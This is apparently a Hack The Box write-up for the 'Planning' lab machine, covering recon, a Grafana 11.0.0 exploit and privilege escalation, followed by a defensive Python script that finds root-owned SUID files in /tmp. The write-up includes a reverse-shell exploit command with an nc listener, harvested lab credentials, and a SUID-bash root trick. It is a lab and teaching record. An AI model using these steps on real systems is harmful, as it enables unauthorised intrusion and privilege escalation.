Planning

Machine Information

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

Recon

Nmap

First, recon the IP with nmap and get the open ports -->

nmap -p- --open -sCV 10.10.11.68 -oG allPorts
#################################################
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On :80 there is basic virtual hosting for planning.htb

Web

gobuster dir -u http://planning.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -x txt,html,php,js,json
===============================================================
/index.php            (Status: 200) [Size: 23914]
/about.php            (Status: 200) [Size: 12727]
/contact.php          (Status: 200) [Size: 10632]
/img                  (Status: 301) [Size: 178] [--> http://planning.htb/img/]
/detail.php           (Status: 200) [Size: 13006]
/css                  (Status: 301) [Size: 178] [--> http://planning.htb/css/]
/lib                  (Status: 301) [Size: 178] [--> http://planning.htb/lib/]
/js                   (Status: 301) [Size: 178] [--> http://planning.htb/js/]
/course.php           (Status: 200) [Size: 10229]
/enroll.php           (Status: 200) [Size: 7053]

course.php & enroll.php

Hmm... strange... let's try with subdomains -->

Subdomains Enum

gobuster vhost -u http://planning.htb -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt --append-domain -t 40
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]

Add it into /etc/hosts

Hack The Box gives us a comment with a username and password = admin / 0D5oT70Fq13EvB5r

Grafana v11.0.0

Exploit

python3 poc.py --url http://grafana.planning.htb/login/ --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.14.90 --reverse-port 4444
## NC
nc -lvnp 4444

Nice! From the IP we can see we are inside Docker, so... we need to escape from it -->

Docker Escape

Inside the env output we can see credentials -->

enzo:RioTecRANDEntANT!

SSH Connection

ssh enzo@10.10.11.68

Root Flag

We can see an internal port listening locally on 8000, maybe a web interface, so do SSH tunneling -->

SSH Tunneling

ssh -L 8000:127.0.0.1:8000 enzo@10.10.11.68

With it, I go to the browser and open 127.0.0.1:8000. We can see a basic login panel -->

I'm going to search for some credential inside the host with enzo's session, and I found a credential in /var/www/web -->

root:EXTRapHY

I go back to the website on :8000 and log in with these credentials... but nothing... Search more -->

Password = P4ssw0rdS0pRi0T3c

Try to login into the web site :8000 -->

root : P4ssw0rdS0pRi0T3c

We can create a new "Job" and set a command -->

After the job executes, we can go to /tmp/, see the bash copy there, and execute bash -p to get root -->
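The last step leaves a root-owned SUID copy of bash in /tmp/, which is exactly the artifact a defender should hunt for on a host where a job scheduler runs as root. The following Python audit is an added example, not part of the original writeup: it flags root-owned setuid/setgid regular files under temp and home directories (SUSPECT_DIRS is an assumed list, adjust for the host).

```python
import os
import stat
from dataclasses import dataclass
from typing import List, Optional

# Directories where a root-owned SUID binary never belongs.
# Assumed list for this example; extend it for the host being audited.
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home")


@dataclass
class Finding:
    path: str
    owner_uid: int
    mode: str      # symbolic mode, e.g. "-rwsr-xr-x"
    reason: str


def classify(path: str, st_mode: int, st_uid: int) -> Optional[Finding]:
    """Pure check on one file's stat data, so it can be tested without a real SUID file.

    Returns a Finding for a regular, root-owned file with the setuid or setgid bit
    set that lives under one of SUSPECT_DIRS; None for anything else."""
    if not stat.S_ISREG(st_mode):
        return None
    if not st_mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    if st_uid != 0:
        return None
    if not any(path.startswith(d.rstrip("/") + "/") for d in SUSPECT_DIRS):
        return None
    which = "setuid" if st_mode & stat.S_ISUID else "setgid"
    return Finding(path, st_uid, stat.filemode(st_mode),
                   f"root-owned {which} file in a temp/home directory")


def scan(roots=SUSPECT_DIRS) -> List[Finding]:
    """Walk the suspect directories with lstat (symlinks are not followed)."""
    findings: List[Finding] = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue  # vanished or unreadable entry; keep scanning
                found = classify(full, st.st_mode, st.st_uid)
                if found:
                    findings.append(found)
    return findings


if __name__ == "__main__":
    for f in scan():
        print(f"{f.mode} uid={f.owner_uid} {f.path}  <- {f.reason}")
```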
